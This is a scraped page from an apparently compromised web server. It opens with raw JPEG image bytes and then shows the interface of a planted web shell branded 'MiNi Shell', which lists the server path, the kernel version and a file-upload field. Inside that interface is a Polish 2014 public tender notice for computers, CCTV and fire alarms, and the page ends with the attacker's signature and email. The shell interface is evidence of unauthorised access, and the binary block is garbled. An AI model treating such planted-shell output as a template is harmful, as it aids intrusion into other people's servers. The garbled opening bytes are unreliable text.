JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140325/100008-N-2014.html

<p class="kh_header"><b>Warszawa: ZAKUP I DOSTAWA SPRZĘTU KOMPUTEROWEGO ORAZ INNEGO SPRZĘTU NA POTRZEBY PROJEKTU KOMPLEKSOWA INFORMATYZACJA PLACÓWEK STOWARZYSZENIA PO PIERWSZE RODZINA.</b><br>
<b>Numer ogłoszenia: 100008 - 2014; data zamieszczenia: 25.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stowarzyszenie "Po pierwsze rodzina" , ul. Wojska Polskiego 29, 01-515 Warszawa, woj. mazowieckie, tel. 224 906 928, faks 228 393 957.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aga.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP I DOSTAWA SPRZĘTU KOMPUTEROWEGO ORAZ INNEGO SPRZĘTU NA POTRZEBY PROJEKTU KOMPLEKSOWA INFORMATYZACJA PLACÓWEK STOWARZYSZENIA PO PIERWSZE RODZINA..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Sztuk: 1. Komputer typu serwer. Wewnętrzna w firmie archiwizacja wszystkich danych wytwarzanych przez system. Procesor: dwurdzeniowy procesor 3,5 GHz z pamięcią 8MB Pamięć operacyjna: 8GB DDR3 1600 MHz Napęd optyczny: Nagrywarka DVD-RW Dysk twardy: 2TB Grafika: karta graficzna o możliwości wyświetlania miliona kolorów. Sieć: przewodowa karta sieciowa PCI. Dwukierunkowa transmisja danych Full Duplex. Obsługiwane funkcje sieci: IEEE 802.1p, IEEE 802.1Q, IEEE 802.3x Interfejs Wi-Fi 802.11ac - zgodny z IEEE 802.11abgn Ekran typu: panoramiczny, przekątna minimum 19 cali, podświetlenie LED, błyszczącą powłoka, wyświetla miliony kolorów. Bezprzewodowa klawiatura i mysz optyczna Minimum 6 portów USB 3.0 System operacyjny i standardowe oprogramowanie biurowe do edycji pism, arkuszy kalkulacyjnych oraz przygotowywania prezentacji. Gwarancja: 2 lata 2. Sztuk: 1. Laptop notbook, Komputer osobisty. Procesor:dwurdzeniowy procesor przynajmniej 1,7 GHz z 4 MB pamięci podręcznej L3. Pamięć masowa flash o pojemności: przynajmniej 512 GB Pamięć operacyjna: 8GB LPDDR3 1600 MHz Grafika: Obsługa dwóch monitorów: możliwość wyświetlania obrazu w milionach kolorów na wyświetlaczu zintegrowanym oraz obraz w rozdzielczości maksymalnie do 2560 x 1600 pikseli na ekranie zewnętrznym. Ekran typu: panoramiczny, przekątna minimum 13 cali, podświetlenie LED, błyszczącą powłoka, wyświetla miliony kolorów. Obsługiwana rozdzielczości maksymalnie 1440x900 pikseli. Interfejs sieci: Wi-Fi 802.11ac - zgodny z IEEE 802.11abgn Porty zewnętrzne: przynajmniej dwa porty USB 3 (do 5 Gbs), port thunderbolt (do 10 Gbs) Wbudowane głośniki stereofoniczne Wbudowane dwa mikrofony Wbudowana kamera Bateria czas pracy: do 12 godzin pracy w sieci bezprzewodowej, 30 dni w stanie gotowości. Wbudowana bateria litowo-polimerowa, pojemność do 55 Wh Wielkość i waga, maksymalnie do: masa 1,4kg, wysokość 1,8 cm, szerokość 33 cm, głębokość 23 cm System operacyjny: dedykowany sprzętowo Standardowe oprogramowanie: biurowe do edycji pism, arkuszy kalkulacyjnych oraz przygotowywania prezentacji. Gwarancja: 2 lata 3. Sztuk: 2. Laptop notbook. Komputer osobisty. Procesor: dwurdzeniowy procesor przynajmniej 1,3GHz z 3 MB pamięci podręcznej L3. Pamięć masowa flash o pojemności: przynajmniej 128 GB Pamięć operacyjna: 4 GB LPDDR3 1600 MHz Grafika: Obsługa dwóch monitorów: możliwość wyświetlania obrazu w milionach kolorów na wyświetlaczu zintegrowanym oraz obraz w rozdzielczości maksymalnie do 2560 x 1600 pikseli na ekranie zewnętrznym. Ekran typu: panoramiczny, przekątna minimum 13 cali, podświetlenie LED, błyszczącą powłoka, wyświetla miliony kolorów. Obsługiwana rozdzielczości maksymalnie 1440x900 pikseli. Interfejs sieci: Wi-Fi 802.11ac - zgodny z IEEE 802.11abgn Porty zewnętrzne: przynajmniej dwa porty USB 3 (do 5 Gbs), port thunderbolt (do 10 Gbs) Wbudowane głośniki stereofoniczne Wbudowane dwa mikrofony Wbudowana kamera Bateria czas pracy: do 12 godzin pracy w sieci bezprzewodowej, 30 dni w stanie gotowości. Wbudowana bateria litowo-polimerowa, pojemność do 55 Wh Wielkość i waga, maksymalnie do: masa 1,4kg, wysokość 1,8 cm, szerokość 33 cm, głębokość 23 cm System operacyjny: dedykowany sprzętowo Standardowe oprogramowanie: biurowe do edycji pism, arkuszy kalkulacyjnych oraz przygotowywania prezentacji. Gwarancja: 2 lata 4. Sztuk: 7. Laptop notbook. Komputer osobisty. Procesor: dwurdzeniowy procesor 2,4 GHz z 3 MB pamięci podręcznej L3. Dysk twardy HDD: 250 GB lub więcej Wbudowana nagrywarka DVD-RW Pamięć operacyjna: 4 GB DDR3 1600 MHz Grafika: Możliwość wyświetlania obrazu w milionach kolorów. Ekran typu: panoramiczny, przekątna minimum 17 cali, podświetlenie LED, błyszczącą powłoka, wyświetla miliony kolorów. Interfejs sieci: Wi-Fi 802.11ac - zgodny z IEEE 802.11abgn 2 porty USB Wbudowane głośniki stereofoniczne Wbudowany mikrofon Wbudowana kamera Waga maksymalnie do 3kg System operacyjny i standardowe oprogramowanie biurowe do edycji pism, arkuszy kalkulacyjnych oraz przygotowywania prezentacji. Gwarancja: 2 lata 5. Sztuk: 5. Komputer stacjonarny. Komputer biurowy. Procesor: dwurdzeniowy procesor 3,5 GHz z pamięcią 4MB Pamięć operacyjna: 4GB DDR3 1600 MHz Napęd optyczny: Nagrywarka DVD-RW Dysk twardy: 500GB Grafika: karta graficzna o możliwości wyświetlania miliona kolorów. Sieć: przewodowa karta sieciowa PCI. Dwukierunkowa transmisja danych Full Duplex. Obsługiwane funkcje sieci: IEEE 802.1p, IEEE 802.1Q, IEEE 802.3x Interfejs Wi-Fi 802.11ac - zgodny z IEEE 802.11abgn Ekran typu: panoramiczny, przekątna minimum 17 cali, podświetlenie LED, błyszczącą powłoka, wyświetla miliony kolorów. Bezprzewodowa klawiatura i mysz optyczna Skaner dokumentów i fotografii Drukarka laserowa Drukarka kodów kreskowych Minimum 6 portów USB 3.0 System operacyjny i standardowe oprogramowanie biurowe do edycji pism, arkuszy kalkulacyjnych oraz przygotowywania prezentacji. Gwarancja: 2 lata Transport i montaż we wskazanym terminie i miejscu. 6. Sztuk: 5. Komputer stacjonarny z dodatkowym osprzętem. Komputer biurowy (dodatkowo umożliwia wprowadzanie danych za pomocą ekranu dotykowego komputera i logowanie przy pomocy czytnika kodów kreskowych). Procesor: dwurdzeniowy procesor 2,5 GHz z pamięcią 4MB Pamięć operacyjna: 4GB DDR3 1600 MHz Dysk twardy: 500GB Grafika: karta graficzna o możliwości wyświetlania miliona kolorów. Sieć: przewodowa karta sieciowa PCI. Dwukierunkowa transmisja danych Full Duplex. Obsługiwane funkcje sieci: IEEE 802.1p, IEEE 802.1Q, IEEE 802.3x Interfejs Wi-Fi 802.11ac - zgodny z IEEE 802.11abgn Ekran typu: panoramiczny, przekątna minimum 17 cali, podświetlenie LED, błyszczącą powłoka, wyświetla miliony kolorów. Dodatkowy monitor dotykowy o przekątnej minimum 15 cali. Czytnik kodów kreskowych Bezprzewodowa klawiatura i mysz optyczna Minimum 3 porty USB 3.0 System operacyjny i standardowe oprogramowanie biurowe do edycji pism, arkuszy kalkulacyjnych oraz przygotowywania prezentacji. Gwarancja: 2 lata Transport i montaż we wskazanym terminie i miejscu 7. Sztuk: 6. Komputer stacjonarny w specjalnej obudowie. Komputer stanowiący punkt publicznego dostępu do informacji dla interesantów, tzw. słupek umożliwiający wgląd do wybranych danych po uprzednim zalogowaniu do systemu za pomocą przeglądarki internetowej i wyświetlanej na ekranie dotykowym klawiatury. Obudowa: Słupek stanowiący obudowę komputera i zarazem stojak podtrzymujący ekran dotykowy wykonane z bezpiecznych materiałów mających atesty do zastosowania w ochronie zdrowia i edukacji dzieci. Kształt słupka ergonomiczny, kolorystyka wesoła, żywe kolory tęczy, wysokość słupka do 1,2 metra z wygodnym dostępem dla osób na wózkach inwalidzkich. Ekran typu monitor dotykowy o przekątnej 17 cali i możliwości wyświetlenia miliona kolorów. Procesor: przynajmniej dwurdzeniowy procesor 1,3 GHz z pamięcią 3MB Pamięć operacyjna: 1GB Dysk twardy: 250GB Grafika: karta graficzna o możliwości wyświetlania miliona kolorów. Sieć: przewodowa karta sieciowa PCI. Dwukierunkowa transmisja danych Full Duplex. Obsługiwane funkcje sieci: IEEE 802.1p, IEEE 802.1Q, IEEE 802.3x Interfejs WiFi 802.11ac - zgodny z IEEE 802.11abgn System operacyjny z obsługą przeglądarki internetowej. Gwarancja: 5 lat Transport i montaż we wskazanym terminie i miejscu 8. Sztuk: 5. Sygnalizacja przeciwpożarowa - jednostka centralna. Ochrona przeciwpożarowa w obiekcie. Urządzenie wykrywające pożar i sygnalizujące zagrożenie we wczesnej fazie za pomocą sygnałów dźwiękowych z wbudowanego głośnika i świetlnych z wbudowanej lampy. Urządzenie umożliwia transmisję danych o stanie poszczególnych czujek drogą internetową po protokole http. Gwarancja: 5 lat Transport i montaż we wskazanym terminie i miejscu 9. Sztuk: 100. Sygnalizacja przeciwpożarowa - czujniki Ochrona przeciwpożarowa w obiekcie. (czujniki kompatybilne z zakupionym sygnalizatorem przeciwpożarowym) Czujniki przeciwpożarowe kompatybilne z jednostka centralną. Gwarancja: 3 lat Transport i montaż we wskazanym terminie i miejscu 10. Sztuk: 5. Cyfrowy rejestrator danych z kamer przemysłowych. Rejestruje i przechowuje dane z kamer. Cyfrowy rejestrator obrazu przynajmniej spełniający parametry: 16 kanałowy z 400 kls w rozdzielczości 4CIF lub H.264 Pojemność: 1 TB Interfejs sieciowy: sieć bezprzewodowa lub sieć wewnętrzna LAN Urządzenie umożliwia na udostępnianie danych wideo oraz sterowanie kamerami po protokole http. Nagrywarka DVD-RW Ekran: LCD 17 cali Klawiatura i mysz bezprzewodowe Gwarancja: 2 lata Transport i montaż we wskazanym terminie i miejscu 11. Sztuk: 25. Kamery przemysłowe. (kamery kompatybilne z zakupionym cyfrowym rejestratorem obrazu). Kolorowe kamery dostosowane do filmowania w dzień i noc, parametry przynajmniej: 700TVL, 960H, obiektyw 2,8-12mm, oświetlacz IR zasięg do 30m (36 diod), funkcja UTC. Kompatybilne z rejestratorem danych. Obudowa: kopułkowa podwieszana do sufitu Gwarancja: 3 lata Transport i montaż we wskazanym terminie i miejscu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.72.00-0, 32.32.20.00-6, 35.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku. Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy, zgodnie z zał. 1 do SIWZ (dotyczy I, II i III części zamówienia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku. Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy, zgodnie z zał. 1 do SIWZ (dotyczy I, II i III części zamówienia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku. Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy, zgodnie z zał. 1 do SIWZ (dotyczy I, II i III części zamówienia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku. Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy, zgodnie z zał. 1 do SIWZ (dotyczy I, II i III części zamówienia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku. Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy, zgodnie z zał. 1 do SIWZ (dotyczy I, II i III części zamówienia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia nw. okoliczności, z uwzględnieniem podanych warunków ich wprowadzenia: 1) w wypadku zmian podmiotowych po stronie wykonawcy, zgodnie z obowiązującymi przepisami prawa, 2) w wypadku zmian nr rachunku bankowego wykonawcy, na który jest płacone wynagrodzenie, 3) w wypadku zmiany formy zabezpieczenia należytego wykonania umowy, 4) w wypadku zmian terminu wykonania umowy oraz terminu płatności, jeżeli opóźnienie w dostawie będzie następowało z przyczyn leżących po stronie zamawiającego, 5) w wypadku zmian w zakresie rodzaju/modelu sprzętu w przypadku obiektywnej niemożności dostarczenia sprzętu, w szczególności zakończenia produkcji, niedostępności na rynku, umowę można zmienić co do rodzaju/typu/modelu Urządzenia, pod warunkiem, Urządzenia będą nowszą wersją oferowanego modelu, będą miały lepsze wszystkie parametry, bądź część parametrów i pozostałe parametry bez zmian, z jednoczesnym zachowaniem wymagań określonych przez Zamawiającego dla dostarczanych Urządzeń w nin. postępowaniu o udzielenie zamówienia publicznego, 6) w wypadku zmian przepisów prawa związanych z realizacją zamówienia (w szczególności VAT, przepisy branżowe związane z przedmiotem zamówienia), 7) w wypadku zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia umowy okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze stron nie ponosi odpowiedzialności, skutkującej brakiem możliwości należytego wykonania umowy albo zaistnienia okoliczności leżących po stronie zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które były niemożliwe do przewidzenia w chwili zawarcia umowy, 8) w pozostałym zakresie - w sytuacji nieprzewidzianej i niezawinionej przez strony, której wystąpienia strony nie mogły przewidzieć pomimo zachowania należytej staranności. Zmiany umowy określone w ppkt 4 i 5 nie będą skutkować zmianą wynagrodzenia przysługującego Wykonawcy z tytułu realizacji umowy ani naliczeniem kar umownych, bądź odsetek ustawowych za zwłokę dla którejkolwiek ze stron tej umowy. Warunkiem dokonania zmian jest złożenie wniosku przez stronę inicjującą zmianę, zawierającego: 1) opis zmiany, 2) uzasadnienie zmiany, 3) obliczenie kosztów zmiany, jeżeli zmiana będzie miała wpływ na wynagrodzenie wykonawcy. Zmiana postanowień umowy może nastąpić wyłącznie za zgodą obu stron wyrażona w formie pisemnego aneksu pod rygorem nieważności. Zmiany umowy, muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy, stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w specyfikacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aga.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: 01-515 Warszawa al. Wojska Polskiego 29 w godzinach 9-13 po uprzednim umówieniu się telefonicznym tel. 509484067.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2014 godzina 11:00, miejsce: Siedziba Zamawiającego: 01-515 Warszawa al. Wojska Polskiego 29.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane ze środków Unii Europejskiej (Europejski Fundusz Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com